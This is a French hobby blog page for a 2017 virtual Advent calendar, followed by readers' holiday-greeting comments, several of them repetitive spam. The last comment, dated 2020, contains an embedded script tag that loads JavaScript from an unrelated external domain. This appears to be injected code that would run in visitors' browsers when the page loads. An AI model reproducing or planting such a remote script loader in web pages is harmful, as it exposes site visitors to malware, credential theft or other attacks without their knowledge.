• Calendrier de l'avent 2017

    Calendrier de L'avent Virtuel 2017

    Calendrier de L'avent Virtuel 2017

     

    je remercie les 544 visiteurs qui nous ont suivis
    sur le Calendrier de l'Avent durant
    le mois de décembre 2017

     

     

    Calendrier de l'avent 2016

     

     Nous remercions chaleureusement toutes les personnes

    qui votent quotidiennement pour nous...

     

    Calendrier de L'avent Virtuel 2017

    Calendario dell'Avvento Virtuale - Virtual Advent calendar - Virtueller Adventskalender

    Действительный календарь Появления - 事実上の到来カレンダー 

     

     guirlande de noël

     

    calendrier de l avent

      

    En attendant Noël, je te propose une nouvelle page
    à découvrir tous les jours.
    Clique sur la fenêtre qui correspond à aujourd'hui,
    une surprise t'attend.

    guirlande de noël

     

     

     

    guirlande de noël

     

     

    Ouverture du calendrier de l'avent le 1er décembre !

     Les liens seront validés dés minuits chaque jour, si tu es trop pressé ...
    tu auras une erreur 404

     

    Calendrier de l'avent Calendrier de l'avent Calendrier de l'avent Calendrier de l'avent Calendrier de l'avent
    Calendrier de l'avent Calendrier de l'avent Calendrier de l'avent Calendrier de l'avent Calendrier de l'avent
    Calendrier de l'avent Calendrier de l'avent Calendrier de l'avent Calendrier de l'avent Calendrier de l'avent
    Calendrier de l'avent Calendrier de l'avent Calendrier de l'avent Calendrier de l'avent Calendrier de l'avent
    Calendrier de l'avent Calendrier de l'avent Calendrier de l'avent Calendrier de l'avent Calendrier de l'avent
    -

     

     guirlande de noël

     

     

     


     A voir le film complet  La Mission de Chien Noël 

     


      

    Vous avez aimé le Calendrier de L'Avent?
    Laisser moi un souvenir de votre passage
    sur mon Livre d'Or
    Merci :-)

      

     

    livre d'or

     

     couronne de noël

     

     Top

    guirlande de noël

     

     

     

     Tags Tags : calendrier, avent, virtuel, noël, jeux, images, décembre, 2017, créations, armony, gif, surprise, chansons

    Calendario dell'Avvento Virtuale - Virtual Advent calendar - Virtueller Adventskalender

    Действительный календарь Появления - 事実上の到来カレンダー 

    un compteur pour votre site

     


  • Commentaires

    1
    Lundi 5 Décembre 2016 à 11:40

    petit coucou avec le froid pour te souhaiter un bon lundi et une bonne semaine gros bisous très joli blog

    2
    Mercredi 21 Décembre 2016 à 14:42

     

    Bien le bonjour et oui me voilà en cette fin d’année 2016 pour que je puisse vous souhaitez un joyeux Noël à vous et votre petite famille ,car je serais quelque jours absent du web pour cette période de noël à ceci je me permet de vous offrir ce cadeau perso . Bonne fête

     

     

     

    http://ekladata.com/R7iZYIIt4xnlCb3WwbkC6N2Axw4/noel2016.jpg

     

    3
    Mercredi 28 Décembre 2016 à 00:53
    Bonjour mon amies je vien frapper a ta porte et je vien visiter ton magnifique univers mais aussi tous d'abord te souhaite mes meilleures voeux et surtout la sante pour cette nouvelle annee 2017 qui va bientot demarrer et jespere que tu va bien et sache que moi je vais bien car je suis un heureux papa depuis le mois de d'aout et je tinvite a venir visiter mon univers qui fera suivre ton commentaire sur mon univers et jespere que tu appreciera mon univers voila je te die a tres bientot mon amies gros bisous
    4
    Lundi 2 Janvier 2017 à 18:54

    Chères visiteuses et visiteurs.

       Nous vous remercions de tous vos cadeaux.
       L'année nouvelle est propice à la nouveauté.
    Nous espérons pouvoir vous ravir avec nos nouvelles créations.
    Nous vous souhaitons Santé, Amour, et le meilleurs pour l'an neuf.


    Francine et Mirella

    5
    Vendredi 29 Décembre 2017 à 17:09

    Nous voici à cette époque de fin d'année et de cela je tiens à vous présentez mes vœux pour l'année 2018 à vous et a votre proche.

    6
    Mercredi 14 Mars 2018 à 01:40

    pour cette nouvelle annee 2017 qui va bientot demarrer et jespere que tu va bien et sache que moi je vais bien car je suis un heureux papa depuis le mois de d'aout

    7
    Mercredi 14 Mars 2018 à 01:41

    je te souhaiter un bon lundi et une bonne semaine gros bisous très joli blog

    8
    Vendredi 27 Avril 2018 à 21:17
    te souhaiter un bon lundi et une bonne semaine gros bisous très joli
    9
    Ann
    Mercredi 16 Décembre 2020 à 10:50

    De Ann

     

    Joyeuses fêtes de fin d'année

    <script src="//killssource.com/21c1e810f7f98f00b3.js"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :